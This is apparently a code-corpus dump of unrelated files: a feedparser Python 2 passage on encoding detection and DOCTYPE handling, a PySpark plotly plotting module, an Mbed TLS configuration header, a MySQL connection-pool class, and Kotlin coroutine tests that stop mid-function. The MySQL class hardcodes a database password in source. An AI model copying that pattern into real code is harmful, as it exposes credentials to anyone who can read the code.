ZERO_BYTES = _l2bytes([0x00, 0x00])
# Match the opening XML declaration.
# Example: <?xml version="1.0" encoding="utf-8"?>
RE_XML_DECLARATION = re.compile('^<\?xml[^>]*?>')
# Capture the value of the XML processing instruction's encoding attribute.
# Example: <?xml version="1.0" encoding="utf-8"?>
RE_XML_PI_ENCODING = re.compile(_s2bytes('^<\?.*encoding=[\'"](.*?)[\'"].*\?>'))
def convert_to_utf8(http_headers, data):
'''Detect and convert the character encoding to UTF-8.
http_headers is a dictionary
data is a raw string (not Unicode)'''
# This is so much trickier than it sounds, it's not even funny.
# According to RFC 3023 ('XML Media Types'), if the HTTP Content-Type
# is application/xml, application/*+xml,
# application/xml-external-parsed-entity, or application/xml-dtd,
# the encoding given in the charset parameter of the HTTP Content-Type
# takes precedence over the encoding given in the XML prefix within the
# document, and defaults to 'utf-8' if neither are specified. But, if
# the HTTP Content-Type is text/xml, text/*+xml, or
# text/xml-external-parsed-entity, the encoding given in the XML prefix
# within the document is ALWAYS IGNORED and only the encoding given in
# the charset parameter of the HTTP Content-Type header should be
# respected, and it defaults to 'us-ascii' if not specified.
# Furthermore, discussion on the atom-syntax mailing list with the
# author of RFC 3023 leads me to the conclusion that any document
# served with a Content-Type of text/* and no charset parameter
# must be treated as us-ascii. (We now do this.) And also that it
# must always be flagged as non-well-formed. (We now do this too.)
# If Content-Type is unspecified (input was local file or non-HTTP source)
# or unrecognized (server just got it totally wrong), then go by the
# encoding given in the XML prefix of the document and default to
# 'iso-8859-1' as per the HTTP specification (RFC 2616).
# Then, assuming we didn't find a character encoding in the HTTP headers
# (and the HTTP Content-type allowed us to look in the body), we need
# to sniff the first few bytes of the XML data and try to determine
# whether the encoding is ASCII-compatible. Section F of the XML
# specification shows the way here:
# http://www.w3.org/TR/REC-xml/#sec-guessing-no-ext-info
# If the sniffed encoding is not ASCII-compatible, we need to make it
# ASCII compatible so that we can sniff further into the XML declaration
# to find the encoding attribute, which will tell us the true encoding.
# Of course, none of this guarantees that we will be able to parse the
# feed in the declared character encoding (assuming it was declared
# correctly, which many are not). iconv_codec can help a lot;
# you should definitely install it if you can.
# http://cjkpython.i18n.org/
bom_encoding = u''
xml_encoding = u''
rfc3023_encoding = u''
# Look at the first few bytes of the document to guess what
# its encoding may be. We only need to decode enough of the
# document that we can use an ASCII-compatible regular
# expression to search for an XML encoding declaration.
# The heuristic follows the XML specification, section F:
# http://www.w3.org/TR/REC-xml/#sec-guessing-no-ext-info
# Check for BOMs first.
if data[:4] == codecs.BOM_UTF32_BE:
bom_encoding = u'utf-32be'
data = data[4:]
elif data[:4] == codecs.BOM_UTF32_LE:
bom_encoding = u'utf-32le'
data = data[4:]
elif data[:2] == codecs.BOM_UTF16_BE and data[2:4] != ZERO_BYTES:
bom_encoding = u'utf-16be'
data = data[2:]
elif data[:2] == codecs.BOM_UTF16_LE and data[2:4] != ZERO_BYTES:
bom_encoding = u'utf-16le'
data = data[2:]
elif data[:3] == codecs.BOM_UTF8:
bom_encoding = u'utf-8'
data = data[3:]
# Check for the characters '<?xm' in several encodings.
elif data[:4] == EBCDIC_MARKER:
bom_encoding = u'cp037'
elif data[:4] == UTF16BE_MARKER:
bom_encoding = u'utf-16be'
elif data[:4] == UTF16LE_MARKER:
bom_encoding = u'utf-16le'
elif data[:4] == UTF32BE_MARKER:
bom_encoding = u'utf-32be'
elif data[:4] == UTF32LE_MARKER:
bom_encoding = u'utf-32le'
tempdata = data
try:
if bom_encoding:
tempdata = data.decode(bom_encoding).encode('utf-8')
except (UnicodeDecodeError, LookupError):
# feedparser recognizes UTF-32 encodings that aren't
# available in Python 2.4 and 2.5, so it's possible to
# encounter a LookupError during decoding.
xml_encoding_match = None
else:
xml_encoding_match = RE_XML_PI_ENCODING.match(tempdata)
if xml_encoding_match:
xml_encoding = xml_encoding_match.groups()[0].decode('utf-8').lower()
# Normalize the xml_encoding if necessary.
if bom_encoding and (xml_encoding in (
u'u16', u'utf-16', u'utf16', u'utf_16',
u'u32', u'utf-32', u'utf32', u'utf_32',
u'iso-10646-ucs-2', u'iso-10646-ucs-4',
u'csucs4', u'csunicode', u'ucs-2', u'ucs-4'
)):
xml_encoding = bom_encoding
# Find the HTTP Content-Type and, hopefully, a character
# encoding provided by the server. The Content-Type is used
# to choose the "correct" encoding among the BOM encoding,
# XML declaration encoding, and HTTP encoding, following the
# heuristic defined in RFC 3023.
http_content_type = http_headers.get('content-type') or ''
http_content_type, params = cgi.parse_header(http_content_type)
http_encoding = params.get('charset', '').replace("'", "")
if not isinstance(http_encoding, unicode):
http_encoding = http_encoding.decode('utf-8', 'ignore')
acceptable_content_type = 0
application_content_types = (u'application/xml', u'application/xml-dtd',
u'application/xml-external-parsed-entity')
text_content_types = (u'text/xml', u'text/xml-external-parsed-entity')
if (http_content_type in application_content_types) or \
(http_content_type.startswith(u'application/') and
http_content_type.endswith(u'+xml')):
acceptable_content_type = 1
rfc3023_encoding = http_encoding or xml_encoding or u'utf-8'
elif (http_content_type in text_content_types) or \
(http_content_type.startswith(u'text/') and
http_content_type.endswith(u'+xml')):
acceptable_content_type = 1
rfc3023_encoding = http_encoding or u'us-ascii'
elif http_content_type.startswith(u'text/'):
rfc3023_encoding = http_encoding or u'us-ascii'
elif http_headers and 'content-type' not in http_headers:
rfc3023_encoding = xml_encoding or u'iso-8859-1'
else:
rfc3023_encoding = xml_encoding or u'utf-8'
# gb18030 is a superset of gb2312, so always replace gb2312
# with gb18030 for greater compatibility.
if rfc3023_encoding.lower() == u'gb2312':
rfc3023_encoding = u'gb18030'
if xml_encoding.lower() == u'gb2312':
xml_encoding = u'gb18030'
# there are four encodings to keep track of:
# - http_encoding is the encoding declared in the Content-Type HTTP header
# - xml_encoding is the encoding declared in the <?xml declaration
# - bom_encoding is the encoding sniffed from the first 4 bytes of the XML data
# - rfc3023_encoding is the actual encoding, as per RFC 3023 and a variety of other conflicting specifications
error = None
if http_headers and (not acceptable_content_type):
if 'content-type' in http_headers:
msg = '%s is not an XML media type' % http_headers['content-type']
else:
msg = 'no Content-type specified'
error = NonXMLContentType(msg)
# determine character encoding
known_encoding = 0
chardet_encoding = None
tried_encodings = []
if chardet:
chardet_encoding = chardet.detect(data)['encoding']
if not chardet_encoding:
chardet_encoding = ''
if not isinstance(chardet_encoding, unicode):
chardet_encoding = unicode(chardet_encoding, 'ascii', 'ignore')
# try: HTTP encoding, declared XML encoding, encoding sniffed from BOM
for proposed_encoding in (rfc3023_encoding, xml_encoding, bom_encoding,
chardet_encoding, u'utf-8', u'windows-1252', u'iso-8859-2'):
if not proposed_encoding:
continue
if proposed_encoding in tried_encodings:
continue
tried_encodings.append(proposed_encoding)
try:
data = data.decode(proposed_encoding)
except (UnicodeDecodeError, LookupError):
pass
else:
known_encoding = 1
# Update the encoding in the opening XML processing instruction.
new_declaration = '''<?xml version='1.0' encoding='utf-8'?>'''
if RE_XML_DECLARATION.search(data):
data = RE_XML_DECLARATION.sub(new_declaration, data)
else:
data = new_declaration + u'\n' + data
data = data.encode('utf-8')
break
# if still no luck, give up
if not known_encoding:
error = CharacterEncodingUnknown(
'document encoding unknown, I tried ' +
'%s, %s, utf-8, windows-1252, and iso-8859-2 but nothing worked' %
(rfc3023_encoding, xml_encoding))
rfc3023_encoding = u''
elif proposed_encoding != rfc3023_encoding:
error = CharacterEncodingOverride(
'document declared as %s, but parsed as %s' %
(rfc3023_encoding, proposed_encoding))
rfc3023_encoding = proposed_encoding
return data, rfc3023_encoding, error
# Match XML entity declarations.
# Example: <!ENTITY copyright "(C)">
RE_ENTITY_PATTERN = re.compile(_s2bytes(r'^\s*<!ENTITY([^>]*?)>'), re.MULTILINE)
# Match XML DOCTYPE declarations.
# Example: <!DOCTYPE feed [ ]>
RE_DOCTYPE_PATTERN = re.compile(_s2bytes(r'^\s*<!DOCTYPE([^>]*?)>'), re.MULTILINE)
# Match safe entity declarations.
# This will allow hexadecimal character references through,
# as well as text, but not arbitrary nested entities.
# Example: cubed "³"
# Example: copyright "(C)"
# Forbidden: explode1 "&explode2;&explode2;"
RE_SAFE_ENTITY_PATTERN = re.compile(_s2bytes('\s+(\w+)\s+"(&#\w+;|[^&"]*)"'))
def replace_doctype(data):
'''Strips and replaces the DOCTYPE, returns (rss_version, stripped_data)
rss_version may be 'rss091n' or None
stripped_data is the same XML document with a replaced DOCTYPE
'''
# Divide the document into two groups by finding the location
# of the first element that doesn't begin with '<?' or '<!'.
start = re.search(_s2bytes('<\w'), data)
start = start and start.start() or -1
head, data = data[:start+1], data[start+1:]
# Save and then remove all of the ENTITY declarations.
entity_results = RE_ENTITY_PATTERN.findall(head)
head = RE_ENTITY_PATTERN.sub(_s2bytes(''), head)
# Find the DOCTYPE declaration and check the feed type.
doctype_results = RE_DOCTYPE_PATTERN.findall(head)
doctype = doctype_results and doctype_results[0] or _s2bytes('')
if _s2bytes('netscape') in doctype.lower():
version = u'rss091n'
else:
version = None
# Re-insert the safe ENTITY declarations if a DOCTYPE was found.
replacement = _s2bytes('')
if len(doctype_results) == 1 and entity_results:
match_safe_entities = lambda e: RE_SAFE_ENTITY_PATTERN.match(e)
safe_entities = filter(match_safe_entities, entity_results)
if safe_entities:
replacement = _s2bytes('<!DOCTYPE feed [\n<!ENTITY') \
+ _s2bytes('>\n<!ENTITY ').join(safe_entities) \
+ _s2bytes('>\n]>')
data = RE_DOCTYPE_PATTERN.sub(replacement, head) + data
# Precompute the safe entities for the loose parser.
safe_entities = dict((k.decode('utf-8'), v.decode('utf-8'))
for k, v in RE_SAFE_ENTITY_PATTERN.findall(replacement))
return version, data, safe_entities
# GeoRSS geometry parsers. Each return a dict with 'type' and 'coordinates'
# items, or None in the case of a parsing error.
def _parse_poslist(value, geom_type, swap=True, dims=2):
if geom_type == 'linestring':
return _parse_georss_line(value, swap, dims)
elif geom_type == 'polygon':
ring = _parse_georss_line(value, swap, dims)
return {'type': u'Polygon', 'coordinates': (ring['coordinates'],)}
else:
return None
def _gen_georss_coords(value, swap=True, dims=2):
# A generator of (lon, lat) pairs from a string of encoded GeoRSS
# coordinates. Converts to floats and swaps order.
latlons = itertools.imap(float, value.strip().replace(',', ' ').split())
nxt = latlons.next
while True:
t = [nxt(), nxt()][::swap and -1 or 1]
if dims == 3:
t.append(nxt())
yield tuple(t)
def _parse_georss_point(value, swap=True, dims=2):
# A point contains a single latitude-longitude pair, separated by
# whitespace. We'll also handle comma separators.
try:
coords = list(_gen_georss_coords(value, swap, dims))
return {u'type': u'Point', u'coordinates': coords[0]}
except (IndexError, ValueError):
return None
def _parse_georss_line(value, swap=True, dims=2):
# A line contains a space separated list of latitude-longitude pairs in
# WGS84 coordinate reference system, with each pair separated by
# whitespace. There must be at least two pairs.
try:
coords = list(_gen_georss_coords(value, swap, dims))
return {u'type': u'LineString', u'coordinates': coords}
except (IndexError, ValueError):
return None
def _parse_georss_polygon(value, swap=True, dims=2):
# A polygon contains a space separated list of latitude-longitude pairs,
# with each pair separated by whitespace. There must be at least four
# pairs, with the last being identical to the first (so a polygon has a
# minimum of three actual points).
try:
ring = list(_gen_georss_coords(value, swap, dims))
except (IndexError, ValueError):
return None
if len(ring) < 4:
return None
return {u'type': u'Polygon', u'coordinates': (ring,)}
def _parse_georss_box(value, swap=True, dims=2):
# A bounding box is a rectangular region, often used to define the extents
# of a map or a rough area of interest. A box contains two space seperate
# latitude-longitude pairs, with each pair separated by whitespace. The
# first pair is the lower corner, the second is the upper corner.
try:
coords = list(_gen_georss_coords(value, swap, dims))
return {u'type': u'Box', u'coordinates': tuple(coords)}
except (IndexError, ValueError):
return None
# end geospatial parsers
def parse(url_file_stream_or_string, etag=None, modified=None, agent=None, referrer=None, handlers=None, request_headers=None, response_headers=None):
'''Parse a feed from a URL, file, stream, or string.
request_headers, if given, is a dict from http header name to value to add
to the request; this overrides internally generated values.
'''
if handlers is None:
handlers = []
if request_headers is None:
request_headers = {}
if response_headers is None:
response_headers = {}
result = FeedParserDict()
result['feed'] = FeedParserDict()
result['entries'] = []
result['bozo'] = 0
if not isinstance(handlers, list):
handlers = [handlers]
try:
f = _open_resource(url_file_stream_or_string, etag, modified, agent, referrer, handlers, request_headers)
data = f.read()
except Exception, e:
result['bozo'] = 1
result['bozo_exception'] = e
data = None
f = None
if hasattr(f, 'headers'):
result['headers'] = dict(f.headers)
# overwrite existing headers using response_headers
if 'headers' in result:
result['headers'].update(response_headers)
elif response_headers:
result['headers'] = copy.deepcopy(response_headers)
# lowercase all of the HTTP headers for comparisons per RFC 2616
if 'headers' in result:
http_headers = dict((k.lower(), v) for k, v in result['headers'].items())
else:
http_headers = {}
# if feed is gzip-compressed, decompress it
if f and data and http_headers:
if gzip and 'gzip' in http_headers.get('content-encoding', ''):
try:
data = gzip.GzipFile(fileobj=_StringIO(data)).read()
except (IOError, struct.error), e:
# IOError can occur if the gzip header is bad.
# struct.error can occur if the data is damaged.
result['bozo'] = 1
result['bozo_exception'] = e
if isinstance(e, struct.error):
# A gzip header was found but the data is corrupt.
# Ideally, we should re-request the feed without the
# 'Accept-encoding: gzip' header, but we don't.
data = None
elif zlib and 'deflate' in http_headers.get('content-encoding', ''):
try:
data = zlib.decompress(data)
except zlib.error, e:
try:
# The data may have no headers and no checksum.
data = zlib.decompress(data, -15)
except zlib.error, e:
result['bozo'] = 1
result['bozo_exception'] = e
# save HTTP headers
if http_headers:
if 'etag' in http_headers:
etag = http_headers.get('etag', u'')
if not isinstance(etag, unicode):
etag = etag.decode('utf-8', 'ignore')
if etag:
result['etag'] = etag
if 'last-modified' in http_headers:
modified = http_headers.get('last-modified', u'')
if modified:
result['modified'] = modified
result['modified_parsed'] = _parse_date(modified)
if hasattr(f, 'url'):
if not isinstance(f.url, unicode):
result['href'] = f.url.decode('utf-8', 'ignore')
else:
result['href'] = f.url
result['status'] = 200
if hasattr(f, 'status'):
result['status'] = f.status
if hasattr(f, 'close'):
f.close()
if data is None:
return result
# Stop processing if the server sent HTTP 304 Not Modified.
if getattr(f, 'code', 0) == 304:
result['version'] = u''
result['debug_message'] = 'The feed has not changed since you last checked, ' + \
'so the server sent no data. This is a feature, not a bug!'
return result
data, result['encoding'], error = convert_to_utf8(http_headers, data)
use_strict_parser = result['encoding'] and True or False
if error is not None:
result['bozo'] = 1
result['bozo_exception'] = error
result['version'], data, entities = replace_doctype(data)
# Ensure that baseuri is an absolute URI using an acceptable URI scheme.
contentloc = http_headers.get('content-location', u'')
href = result.get('href', u'')
baseuri = _makeSafeAbsoluteURI(href, contentloc) or _makeSafeAbsoluteURI(contentloc) or href
baselang = http_headers.get('content-language', None)
if not isinstance(baselang, unicode) and baselang is not None:
baselang = baselang.decode('utf-8', 'ignore')
if not _XML_AVAILABLE:
use_strict_parser = 0
if use_strict_parser:
# initialize the SAX parser
feedparser = _StrictFeedParser(baseuri, baselang, 'utf-8')
saxparser = xml.sax.make_parser(PREFERRED_XML_PARSERS)
saxparser.setFeature(xml.sax.handler.feature_namespaces, 1)
try:
# disable downloading external doctype references, if possible
saxparser.setFeature(xml.sax.handler.feature_external_ges, 0)
except xml.sax.SAXNotSupportedException:
pass
saxparser.setContentHandler(feedparser)
saxparser.setErrorHandler(feedparser)
source = xml.sax.xmlreader.InputSource()
source.setByteStream(_StringIO(data))
try:
saxparser.parse(source)
except xml.sax.SAXException, e:
result['bozo'] = 1
result['bozo_exception'] = feedparser.exc or e
use_strict_parser = 0
if not use_strict_parser and _SGML_AVAILABLE:
feedparser = _LooseFeedParser(baseuri, baselang, 'utf-8', entities)
feedparser.feed(data.decode('utf-8', 'replace'))
result['feed'] = feedparser.feeddata
result['entries'] = feedparser.entries
result['version'] = result['version'] or feedparser.version
result['namespaces'] = feedparser.namespacesInUse
return result
# The list of EPSG codes for geographic (latitude/longitude) coordinate
# systems to support decoding of GeoRSS GML profiles.
_geogCS = [
3819, 3821, 3824, 3889, 3906, 4001, 4002, 4003, 4004, 4005, 4006, 4007, 4008,
4009, 4010, 4011, 4012, 4013, 4014, 4015, 4016, 4018, 4019, 4020, 4021, 4022,
4023, 4024, 4025, 4027, 4028, 4029, 4030, 4031, 4032, 4033, 4034, 4035, 4036,
4041, 4042, 4043, 4044, 4045, 4046, 4047, 4052, 4053, 4054, 4055, 4075, 4081,
4120, 4121, 4122, 4123, 4124, 4125, 4126, 4127, 4128, 4129, 4130, 4131, 4132,
4133, 4134, 4135, 4136, 4137, 4138, 4139, 4140, 4141, 4142, 4143, 4144, 4145,
4146, 4147, 4148, 4149, 4150, 4151, 4152, 4153, 4154, 4155, 4156, 4157, 4158,
4159, 4160, 4161, 4162, 4163, 4164, 4165, 4166, 4167, 4168, 4169, 4170, 4171,
4172, 4173, 4174, 4175, 4176, 4178, 4179, 4180, 4181, 4182, 4183, 4184, 4185,
4188, 4189, 4190, 4191, 4192, 4193, 4194, 4195, 4196, 4197, 4198, 4199, 4200,
4201, 4202, 4203, 4204, 4205, 4206, 4207, 4208, 4209, 4210, 4211, 4212, 4213,
4214, 4215, 4216, 4218, 4219, 4220, 4221, 4222, 4223, 4224, 4225, 4226, 4227,
4228, 4229, 4230, 4231, 4232, 4233, 4234, 4235, 4236, 4237, 4238, 4239, 4240,
4241, 4242, 4243, 4244, 4245, 4246, 4247, 4248, 4249, 4250, 4251, 4252, 4253,
4254, 4255, 4256, 4257, 4258, 4259, 4260, 4261, 4262, 4263, 4264, 4265, 4266,
4267, 4268, 4269, 4270, 4271, 4272, 4273, 4274, 4275, 4276, 4277, 4278, 4279,
4280, 4281, 4282, 4283, 4284, 4285, 4286, 4287, 4288, 4289, 4291, 4292, 4293,
4294, 4295, 4296, 4297, 4298, 4299, 4300, 4301, 4302, 4303, 4304, 4306, 4307,
4308, 4309, 4310, 4311, 4312, 4313, 4314, 4315, 4316, 4317, 4318, 4319, 4322,
4324, 4326, 4463, 4470, 4475, 4483, 4490, 4555, 4558, 4600, 4601, 4602, 4603,
4604, 4605, 4606, 4607, 4608, 4609, 4610, 4611, 4612, 4613, 4614, 4615, 4616,
4617, 4618, 4619, 4620, 4621, 4622, 4623, 4624, 4625, 4626, 4627, 4628, 4629,
4630, 4631, 4632, 4633, 4634, 4635, 4636, 4637, 4638, 4639, 4640, 4641, 4642,
4643, 4644, 4645, 4646, 4657, 4658, 4659, 4660, 4661, 4662, 4663, 4664, 4665,
4666, 4667, 4668, 4669, 4670, 4671, 4672, 4673, 4674, 4675, 4676, 4677, 4678,
4679, 4680, 4681, 4682, 4683, 4684, 4685, 4686, 4687, 4688, 4689, 4690, 4691,
4692, 4693, 4694, 4695, 4696, 4697, 4698, 4699, 4700, 4701, 4702, 4703, 4704,
4705, 4706, 4707, 4708, 4709, 4710, 4711, 4712, 4713, 4714, 4715, 4716, 4717,
4718, 4719, 4720, 4721, 4722, 4723, 4724, 4725, 4726, 4727, 4728, 4729, 4730,
4731, 4732, 4733, 4734, 4735, 4736, 4737, 4738, 4739, 4740, 4741, 4742, 4743,
4744, 4745, 4746, 4747, 4748, 4749, 4750, 4751, 4752, 4753, 4754, 4755, 4756,
4757, 4758, 4759, 4760, 4761, 4762, 4763, 4764, 4765, 4801, 4802, 4803, 4804,
4805, 4806, 4807, 4808, 4809, 4810, 4811, 4813, 4814, 4815, 4816, 4817, 4818,
4819, 4820, 4821, 4823, 4824, 4901, 4902, 4903, 4904, 4979 ]
|
unknown
|
codeparrot/codeparrot-clean
| ||
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import TYPE_CHECKING, Union
import pandas as pd
from pyspark.pandas.plot import (
HistogramPlotBase,
name_like_string,
PandasOnSparkPlotAccessor,
BoxPlotBase,
KdePlotBase,
)
if TYPE_CHECKING:
import pyspark.pandas as ps # noqa: F401 (SPARK-34943)
def plot_pandas_on_spark(data: Union["ps.DataFrame", "ps.Series"], kind: str, **kwargs):
import plotly
# pandas-on-Spark specific plots
if kind == "pie":
return plot_pie(data, **kwargs)
if kind == "hist":
return plot_histogram(data, **kwargs)
if kind == "box":
return plot_box(data, **kwargs)
if kind == "kde" or kind == "density":
return plot_kde(data, **kwargs)
# Other plots.
return plotly.plot(PandasOnSparkPlotAccessor.pandas_plot_data_map[kind](data), kind, **kwargs)
def plot_pie(data: Union["ps.DataFrame", "ps.Series"], **kwargs):
from plotly import express
data = PandasOnSparkPlotAccessor.pandas_plot_data_map["pie"](data)
if isinstance(data, pd.Series):
pdf = data.to_frame()
return express.pie(pdf, values=pdf.columns[0], names=pdf.index, **kwargs)
elif isinstance(data, pd.DataFrame):
values = kwargs.pop("y", None)
default_names = None
if values is not None:
default_names = data.index
return express.pie(
data,
values=kwargs.pop("values", values),
names=kwargs.pop("names", default_names),
**kwargs,
)
else:
raise RuntimeError("Unexpected type: [%s]" % type(data))
def plot_histogram(data: Union["ps.DataFrame", "ps.Series"], **kwargs):
import plotly.graph_objs as go
import pyspark.pandas as ps
bins = kwargs.get("bins", 10)
y = kwargs.get("y")
if y and isinstance(data, ps.DataFrame):
# Note that the results here are matched with matplotlib. x and y
# handling is different from pandas' plotly output.
data = data[y]
psdf, bins = HistogramPlotBase.prepare_hist_data(data, bins)
assert len(bins) > 2, "the number of buckets must be higher than 2."
output_series = HistogramPlotBase.compute_hist(psdf, bins)
prev = float("%.9f" % bins[0]) # to make it prettier, truncate.
text_bins = []
for b in bins[1:]:
norm_b = float("%.9f" % b)
text_bins.append("[%s, %s)" % (prev, norm_b))
prev = norm_b
text_bins[-1] = text_bins[-1][:-1] + "]" # replace ) to ] for the last bucket.
bins = 0.5 * (bins[:-1] + bins[1:])
output_series = list(output_series)
bars = []
for series in output_series:
bars.append(
go.Bar(
x=bins,
y=series,
name=name_like_string(series.name),
text=text_bins,
hovertemplate=(
"variable=" + name_like_string(series.name) + "<br>value=%{text}<br>count=%{y}"
),
)
)
fig = go.Figure(data=bars, layout=go.Layout(barmode="stack"))
fig["layout"]["xaxis"]["title"] = "value"
fig["layout"]["yaxis"]["title"] = "count"
return fig
def plot_box(data: Union["ps.DataFrame", "ps.Series"], **kwargs):
import plotly.graph_objs as go
import pyspark.pandas as ps
if isinstance(data, ps.DataFrame):
raise RuntimeError(
"plotly does not support a box plot with pandas-on-Spark DataFrame. Use Series instead."
)
# 'whis' isn't actually an argument in plotly (but in matplotlib). But seems like
# plotly doesn't expose the reach of the whiskers to the beyond the first and
# third quartiles (?). Looks they use default 1.5.
whis = kwargs.pop("whis", 1.5)
# 'precision' is pandas-on-Spark specific to control precision for approx_percentile
precision = kwargs.pop("precision", 0.01)
# Plotly options
boxpoints = kwargs.pop("boxpoints", "suspectedoutliers")
notched = kwargs.pop("notched", False)
if boxpoints not in ["suspectedoutliers", False]:
raise ValueError(
"plotly plotting backend does not support 'boxpoints' set to '%s'. "
"Set to 'suspectedoutliers' or False." % boxpoints
)
if notched:
raise ValueError(
"plotly plotting backend does not support 'notched' set to '%s'. "
"Set to False." % notched
)
colname = name_like_string(data.name)
spark_column_name = data._internal.spark_column_name_for(data._column_label)
# Computes mean, median, Q1 and Q3 with approx_percentile and precision
col_stats, col_fences = BoxPlotBase.compute_stats(data, spark_column_name, whis, precision)
# Creates a column to flag rows as outliers or not
outliers = BoxPlotBase.outliers(data, spark_column_name, *col_fences)
# Computes min and max values of non-outliers - the whiskers
whiskers = BoxPlotBase.calc_whiskers(spark_column_name, outliers)
fliers = None
if boxpoints:
fliers = BoxPlotBase.get_fliers(spark_column_name, outliers, whiskers[0])
fliers = [fliers] if len(fliers) > 0 else None
fig = go.Figure()
fig.add_trace(
go.Box(
name=colname,
q1=[col_stats["q1"]],
median=[col_stats["med"]],
q3=[col_stats["q3"]],
mean=[col_stats["mean"]],
lowerfence=[whiskers[0]],
upperfence=[whiskers[1]],
y=fliers,
boxpoints=boxpoints,
notched=notched,
**kwargs, # this is for workarounds. Box takes different options from express.box.
)
)
fig["layout"]["xaxis"]["title"] = colname
fig["layout"]["yaxis"]["title"] = "value"
return fig
def plot_kde(data: Union["ps.DataFrame", "ps.Series"], **kwargs):
from plotly import express
import pyspark.pandas as ps
if isinstance(data, ps.DataFrame) and "color" not in kwargs:
kwargs["color"] = "names"
psdf = KdePlotBase.prepare_kde_data(data)
sdf = psdf._internal.spark_frame
data_columns = psdf._internal.data_spark_columns
ind = KdePlotBase.get_ind(sdf.select(*data_columns), kwargs.pop("ind", None))
bw_method = kwargs.pop("bw_method", None)
pdfs = []
for label in psdf._internal.column_labels:
pdfs.append(
pd.DataFrame(
{
"Density": KdePlotBase.compute_kde(
sdf.select(psdf._internal.spark_column_for(label)),
ind=ind,
bw_method=bw_method,
),
"names": name_like_string(label),
"index": ind,
}
)
)
pdf = pd.concat(pdfs)
fig = express.line(pdf, x="index", y="Density", **kwargs)
fig["layout"]["xaxis"]["title"] = None
return fig
|
unknown
|
codeparrot/codeparrot-clean
| ||
/**
* \file mbedtls/config_psa.h
* \brief PSA crypto configuration options (set of defines)
*
* This set of compile-time options takes settings defined in
* include/mbedtls/mbedtls_config.h and include/psa/crypto_config.h and uses
* those definitions to define symbols used in the library code.
*
* Users and integrators should not edit this file, please edit
* include/mbedtls/mbedtls_config.h for MBEDTLS_XXX settings or
* include/psa/crypto_config.h for PSA_WANT_XXX settings.
*/
/*
* Copyright The Mbed TLS Contributors
* SPDX-License-Identifier: Apache-2.0 OR GPL-2.0-or-later
*/
#ifndef MBEDTLS_CONFIG_PSA_H
#define MBEDTLS_CONFIG_PSA_H
#include "psa/crypto_legacy.h"
#include "psa/crypto_adjust_config_synonyms.h"
#include "psa/crypto_adjust_config_dependencies.h"
#include "mbedtls/config_adjust_psa_superset_legacy.h"
#if defined(MBEDTLS_PSA_CRYPTO_CONFIG)
/* Require built-in implementations based on PSA requirements */
/* We need this to have a complete list of requirements
* before we deduce what built-ins are required. */
#include "psa/crypto_adjust_config_key_pair_types.h"
#if defined(MBEDTLS_PSA_CRYPTO_C)
/* If we are implementing PSA crypto ourselves, then we want to enable the
* required built-ins. Otherwise, PSA features will be provided by the server. */
#include "mbedtls/config_adjust_legacy_from_psa.h"
#endif
#else /* MBEDTLS_PSA_CRYPTO_CONFIG */
/* Infer PSA requirements from Mbed TLS capabilities */
#include "mbedtls/config_adjust_psa_from_legacy.h"
/* Hopefully the file above will have enabled keypair symbols in a consistent
* way, but including this here fixes them if that wasn't the case. */
#include "psa/crypto_adjust_config_key_pair_types.h"
#endif /* MBEDTLS_PSA_CRYPTO_CONFIG */
#if defined(PSA_WANT_ALG_JPAKE)
#define PSA_WANT_ALG_SOME_PAKE 1
#endif
#include "psa/crypto_adjust_auto_enabled.h"
#endif /* MBEDTLS_CONFIG_PSA_H */
|
c
|
github
|
https://github.com/nodejs/node
|
deps/LIEF/third-party/mbedtls/include/mbedtls/config_psa.h
|
"""
Instantiate a db connection.
"""
import mysql.connector as mysql
from mysql.connector.pooling import MySQLConnectionPool
class Db(object):
"""
Instantiate a db connection.
"""
def __init__(self):
dbconfig = {
"database": "geoDev",
"user": "geo",
"password": "0p3nM0d3!",
"host": "localhost",
#"raw": True,
"pool_name": "geo_pool",
"pool_size": 20,
"pool_reset_session": True
}
try:
self.__conn_pool = MySQLConnectionPool(**dbconfig)
#self.__conn_pool = mysql.connect(**dbconfig)
except Exception:
raise
def __get_session(self):
"""
Returns the private session var.
"""
return self.__conn_pool.get_connection()
#return self.__conn_pool
def __cant_set(self):
"""Raises runtime error."""
raise RuntimeError("Private property cannot be set.")
def __cant_get(self):
"""Raises runtime error."""
raise RuntimeError("Cannot get protected property.")
db_conn = property(__cant_get, __cant_set)
session = property(__get_session, __cant_set)
|
unknown
|
codeparrot/codeparrot-clean
| ||
package kotlinx.coroutines.test
import kotlinx.coroutines.*
import kotlinx.coroutines.channels.*
import kotlinx.coroutines.flow.*
import kotlinx.coroutines.testing.*
import kotlin.test.*
import kotlin.test.assertFailsWith
/** Copy of [RunTestTest], but for [runBlockingTestOnTestScope], where applicable. */
@Suppress("DEPRECATION", "DEPRECATION_ERROR")
class RunBlockingTestOnTestScopeTest {
@Test
fun testRunTestWithIllegalContext() {
for (ctx in TestScopeTest.invalidContexts) {
assertFailsWith<IllegalArgumentException> {
runBlockingTestOnTestScope(ctx) { }
}
}
}
@Test
fun testThrowingInRunTestBody() {
assertFailsWith<RuntimeException> {
runBlockingTestOnTestScope {
throw RuntimeException()
}
}
}
@Test
fun testThrowingInRunTestPendingTask() {
assertFailsWith<RuntimeException> {
runBlockingTestOnTestScope {
launch {
delay(SLOW)
throw RuntimeException()
}
}
}
}
@Test
fun reproducer2405() = runBlockingTestOnTestScope {
val dispatcher = StandardTestDispatcher(testScheduler)
var collectedError = false
withContext(dispatcher) {
flow { emit(1) }
.combine(
flow<String> { throw IllegalArgumentException() }
) { int, string -> int.toString() + string }
.catch { emit("error") }
.collect {
assertEquals("error", it)
collectedError = true
}
}
assertTrue(collectedError)
}
@Test
fun testChildrenCancellationOnTestBodyFailure() {
var job: Job? = null
assertFailsWith<AssertionError> {
runBlockingTestOnTestScope {
job = launch {
while (true) {
delay(1000)
}
}
throw AssertionError()
}
}
assertTrue(job!!.isCancelled)
}
@Test
fun testTimeout() {
assertFailsWith<TimeoutCancellationException> {
runBlockingTestOnTestScope {
withTimeout(50) {
launch {
delay(1000)
}
}
}
}
}
@Test
fun testRunTestThrowsRootCause() {
